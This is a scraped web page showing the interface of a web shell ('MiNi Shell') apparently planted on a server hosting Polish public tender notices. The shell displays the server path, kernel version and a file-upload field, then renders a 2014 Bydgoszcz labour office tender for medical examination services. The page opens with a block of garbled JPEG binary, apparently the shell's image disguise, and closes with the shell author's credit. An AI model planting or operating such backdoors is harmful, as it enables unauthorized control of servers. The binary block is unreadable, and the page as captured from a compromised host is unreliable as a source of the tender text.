JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140217/54456-N-2014.html

<p class="kh_header"><b>Bydgoszcz: ŚWIADCZENIE USŁUG MEDYCZNYCH DLA OSÓB AKTYWIZOWANYCH  PRZEZ POWIATOWY URZĄD PRACY W BYDGOSZCZY</b><br>
<b>Numer ogłoszenia: 54456 - 2014; data zamieszczenia: 17.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Bydgoszczy , ul. Toruńska 147, 85-950 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 36-04-300, faks 052 36-04-341.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG MEDYCZNYCH DLA OSÓB AKTYWIZOWANYCH  PRZEZ POWIATOWY URZĄD PRACY W BYDGOSZCZY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych dla osób aktywizowanych przez Powiatowy Urząd Pracy w Bydgoszczy.

Przeprowadzanie badań lekarskich ma na celu stwierdzenie możliwości wykonywania określonych czynności zawodowych wymaganych przepisami ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2013r. poz. 674 z późn. zm.) między innymi stwierdzenie zdolności osoby aktywizowanej do wykonywania pracy, uczestnictwa w szkoleniu lub przygotowaniu zawodowym dorosłych, odbywania stażu, wykonywania prac społecznie użytecznych.
Wykonawca otrzyma zapłatę za ilość faktycznie wykonanych badań.

I. CZAS REALIZACJI ZAMÓWIENIA

1. Bieżąca realizacja usług medycznych będzie wykonywana w dni robocze tj. od poniedziałku do piątku, od godz. 7.00  do godz. 15.00 oraz w święta, niebędące dniami ustawowo wolnymi od pracy. Każdy lekarz specjalista musi przyjmować osoby na badania co najmniej 2 razy w tygodniu. Wykonawca zobowiązany jest w dniu zawarcia umowy w sprawie zamówienia publicznego przedłożyć zamawiającemu stały harmonogram (dni i godziny) przyjmowania lekarzy specjalistów. W przypadku zmiany harmonogramu wykonawca zobowiązany jest poinformować zamawiającego o tym fakcie najpóźniej w dniu zaistnienia zmiany.
2. Wykonawca musi rozpocząć procedurę przeprowadzania badań lekarskich w tym samym dniu, w którym zgłosiła się do niego osoba skierowana na badania. Wykonawca nie może odesłać osoby i nie rozpocząć procedury (nie przeprowadzić badań).  Zapis ten nie dotyczy przypadku, gdy osoba skierowana na badania znajduje się w stanie uniemożliwiającym  wykonanie badania  np. pod wpływem alkoholu lub innej substancji odurzającej.
3. Maksymalny okres wykonania badań od dnia zgłoszenia się osoby ze skierowaniem do Wykonawcy do dnia otrzymania zaświadczenia nie może być dłuższy niż 4 dni robocze, chyba że przepisy stanowią inaczej. W przypadku, gdy będzie wymagane wykonanie badań do celów sanitarno - epidemiologicznych okres ten nie może być dłuższy niż 10 dni roboczych, chyba że przepisy stanowią inaczej. 
	

II. SKIEROWANIE I ORZECZENIE LEKARSKIE
1. Wykonawca przeprowadzi badania na podstawie skierowania wydawanego przez zamawiającego. Osoby będą kierowane na badania sukcesywnie w zależności od potrzeb zamawiającego. 
2. Rejestracja osób oraz organizacja udzielania świadczeń odbywać się będzie na zasadach ogólnych przewidzianych dla pacjentów przez wykonawcę. 
3. Badania lekarskie kończą się wydaniem orzeczenia lekarskiego w formie zaświadczenia. Orzeczenie lekarskie otrzymuje bezpośrednio osoba badana w 2 egzemplarzach (oryginał i kopię). Osoba skierowana na badania oryginał zaświadczenia zatrzymuje, a Zamawiającemu dostarcza kopię.
4. Wykonawcy należy się wynagrodzenie za faktycznie przeprowadzone badania.
5. W przypadku, gdy osoba skierowana na badania przedstawi dokumenty świadczące o ważnych badaniach lekarskich Wykonawca zobowiązany jest uwzględnić to(e) badanie(a), nie obciążając Zamawiającego kosztami. 
6. Zamawiający będzie kierował osoby na badania określone w formularzu cenowo-ofertowym, stanowiącym załącznik nr 2 do SIWZ. 
7. Wykonawca jest zobowiązany adekwatnie do wskazanej na skierowaniu grupy zawodowej, szkolenia dobrać rodzaj badań jakie trzeba przeprowadzić zgodnych z obowiązującymi w stosunku do danego zawodu, szkolenia przepisami, chyba że lekarz stwierdzi celowość przeprowadzenia badań dodatkowych na podstawie wywiadu z osobą skierowaną na badania.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych w wysokości nie więcej niż 50 % wartości zamówienia podstawowego. 
Przedmiotem zamówień uzupełniających jest świadczenie usług medycznych dla osób aktywizowanych przez Powiatowy Urząd Pracy w Bydgoszczy.
Przeprowadzanie badań lekarskich ma na celu stwierdzenie możliwości wykonywania określonych czynności zawodowych wymaganych przepisami ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2013r. poz. 674 z późn. zm.) między innymi stwierdzenie zdolności osoby aktywizowanej do wykonywania pracy, uczestnictwa w szkoleniu lub przygotowaniu zawodowym dorosłych, odbywania stażu, wykonywania prac społecznie użytecznych.
Wykonawca otrzyma zapłatę za ilość faktycznie wykonanych badań.

I. CZAS REALIZACJI ZAMÓWIENIA

1. Bieżąca realizacja usług medycznych będzie wykonywana w dni robocze tj. od poniedziałku do piątku, od godz. 7.00  do godz. 15.00 oraz w święta, niebędące dniami ustawowo wolnymi od pracy. Każdy lekarz specjalista musi przyjmować osoby na badania co najmniej 2 razy w tygodniu. Wykonawca zobowiązany jest w dniu zawarcia umowy w sprawie zamówienia publicznego przedłożyć zamawiającemu stały harmonogram (dni i godziny) przyjmowania lekarzy specjalistów. W przypadku zmiany harmonogramu wykonawca zobowiązany jest poinformować zamawiającego o tym fakcie najpóźniej w dniu zaistnienia zmiany.
2. Wykonawca musi rozpocząć procedurę przeprowadzania badań lekarskich w tym samym dniu, w którym zgłosiła się do niego osoba skierowana na badania. Wykonawca nie może odesłać osoby i nie rozpocząć procedury (nie przeprowadzić badań).  Zapis ten nie dotyczy przypadku, gdy osoba skierowana na badania znajduje się w stanie uniemożliwiającym  wykonanie badania  np. pod wpływem alkoholu lub innej substancji odurzającej.
3. Maksymalny okres wykonania badań od dnia zgłoszenia się osoby ze skierowaniem do Wykonawcy do dnia otrzymania zaświadczenia nie może być dłuższy niż 4 dni robocze, chyba że przepisy stanowią inaczej. W przypadku, gdy będzie wymagane wykonanie badań do celów sanitarno - epidemiologicznych okres ten nie może być dłuższy niż 10 dni roboczych, chyba że przepisy stanowią inaczej. 
	

II. SKIEROWANIE I ORZECZENIE LEKARSKIE
1. Wykonawca przeprowadzi badania na podstawie skierowania wydawanego przez zamawiającego. Osoby będą kierowane na badania sukcesywnie w zależności od potrzeb zamawiającego. 
2. Rejestracja osób oraz organizacja udzielania świadczeń odbywać się będzie na zasadach ogólnych przewidzianych dla pacjentów przez wykonawcę. 
3. Badania lekarskie kończą się wydaniem orzeczenia lekarskiego w formie zaświadczenia. Orzeczenie lekarskie otrzymuje bezpośrednio osoba badana w 2 egzemplarzach (oryginał i kopię). Osoba skierowana na badania oryginał zaświadczenia zatrzymuje, a Zamawiającemu dostarcza kopię.
4. Wykonawcy należy się wynagrodzenie za faktycznie przeprowadzone badania.
5. W przypadku, gdy osoba skierowana na badania przedstawi dokumenty świadczące o ważnych badaniach lekarskich Wykonawca zobowiązany jest uwzględnić to(e) badanie(a), nie obciążając Zamawiającego kosztami. 
6. Zamawiający będzie kierował osoby na badania określone w formularzu cenowo-ofertowym, stanowiącym załącznik nr 2 do SIWZ. 
7. Wykonawca jest zobowiązany adekwatnie do wskazanej na skierowaniu grupy zawodowej, szkolenia dobrać rodzaj badań jakie trzeba przeprowadzić zgodnych z obowiązującymi w stosunku do danego zawodu, szkolenia przepisami, chyba że lekarz stwierdzi celowość przeprowadzenia badań dodatkowych na podstawie wywiadu z osobą skierowaną na badania.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0, 85.12.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje pobierania wadium od wykonawców</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku wykonawca musi wykazać, że posiada wpis do rejestru podmiotów wykonujących działalność leczniczą zgodnie z art. 103 ustawy z dnia 15 kwietnia 2011r. o działalności leczniczej (Dz. U. z 2013r., poz. 217).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dysponowania potencjałem technicznym wykonawca musi wykazać, że dysponuje podczas wykonania zamówienia:
pomieszczeniami, umożliwiającymi realizację zamówienia tzn: świadczenie usług medycznych, wyposażonymi w produkty lecznicze, wyroby medyczne, aparaturę i sprzęt medyczny, bez barier architektonicznych umożliwiających osobom niepełnosprawnym udział w badaniach, posiadającymi opinię właściwego organu Państwowej Inspekcji Sanitarnej o spełnieniu warunków wymaganych przy udzielaniu określonych świadczeń zdrowotnych, zgodnych z właściwymi przepisami, w szczególności zgodnych z:
- ustawą z dnia 27.06.1997 r. o służbie medycyny pracy (Dz.U. z 2004 r. Nr 125, poz. 1317 z późn. zm.),
- ustawą z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U. z 2013 r., poz. 217),
- rozporządzeniem Ministra Zdrowia z dnia 26.06.2012r. w sprawie szczegółowych wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą (Dz.U. z 2012r. poz. 739),
- rozporządzeniem Ministra Zdrowia z dnia 21 sierpnia 2006 r. w sprawie szczegółowych warunków bezpiecznej pracy z urządzeniami radiologicznymi (Dz.U. Nr 180, poz. 1325).

Zamawiający wymaga, aby wykonawca dysponował:
- co najmniej pięcioma gabinetami specjalistycznymi (jednym gabinetem lekarskim medycyny pracy, jednym gabinetem okulistycznym, jednym gabinetem laryngologicznym, jednym gabinetem neurologicznym oraz jednym gabinetem psychologicznym umożliwiającym wykonanie badań psychotechnicznych),
- medycznym laboratorium diagnostycznym, zgodnym z rozporządzeniem Ministra Zdrowia z dnia 3 marca 2004 r. w sprawie wymagań, jakim powinno odpowiadać medyczne laboratorium diagnostyczne (Dz. U. Nr 43, poz. 408, z późn. zm.) oraz umożliwiającym wykonanie badania materiału biologicznego na zasadach określonych w ustawie z dnia 27 lipca 2001r. o diagnostyce laboratoryjnej (Dz. U. z 2004r. Nr 144 poz. 1529 z późn. zm.) oraz
- pomieszczeniami umożliwiającymi przeprowadzenie badań sanitarno-epidemiologicznych.

Zamawiający wymaga, aby medyczne laboratorium diagnostyczne oraz pięć gabinetów specjalistycznych znajdowało się w jednym miejscu na terenie miasta Bydgoszczy z możliwością dojazdu miejską komunikacją publiczną w to miejsce. Wykonawca zobowiązany jest wskazać dokładny adres miejsca realizacji zamówienia w wykazie narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług - załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Wykonawca musi wykazać, że  posiada obowiązkowe ubezpieczenie odpowiedzialności cywilnej podmiotu wykonującego działalność leczniczą, zgodnie z rozporządzeniem Ministra Finansów z dnia 22 grudnia 2011 r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej podmiotu wykonującego działalność leczniczą (Dz.U. Nr 293, poz. 1729).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy (Zamawiający wymaga złożenia przez wykonawcę formularza na wzorze zamawiającego - załącznik nr 2 do SIWZ zgodnej z opisem przedmiotu zamówienia zawartym w załączniku nr 1 do SIWZ).
2) Formularz cenowy (Zamawiający wymaga złożenia przez wykonawcę formularza na wzorze zamawiającego - załącznik nr 3 do SIWZ).
3) pełnomocnictwo.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Dokument potwierdzający jakość świadczonych usług - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się możliwość dokonania zmiany postanowień umowy, za porozumieniem stron, w zakresie:
1) miejsca wykonywania zamówienia, gdy konieczność jej dokonania wynika ze zdarzeń, niezależnych od Wykonawcy oraz których nie można było przewidzieć w dniu zawarcia umowy. Zmiana ta nie może prowadzić do obniżenia wymagań technicznych i funkcjonalnych określonych w § 3 niniejszej umowy,
2) terminu realizacji zamówienia w przypadku wcześniejszego wyczerpania kwoty stanowiącej maksymalne wynagrodzenie Wykonawcy,
3) dokumentacji z realizacji zamówienia, gdy konieczność ich dokonania wynika ze zdarzeń, niezależnych od Wykonawcy oraz których nie można było przewidzieć w dniu zawarcia umowy np. zmiana przepisów prawa.
2. Wszelkie zmiany niniejszej umowy, wymagają formy pisemnej, pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pup.bydgoszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Bydgoszczy, ul. Toruńska 147, 85-880 Bydgoszcz, II piętro (sekretariat).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2014 godzina 08:30, miejsce: Powiatowy Urząd Pracy w Bydgoszczy, ul. Toruńska 147, II piętro, sekretariat (pokój 207).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com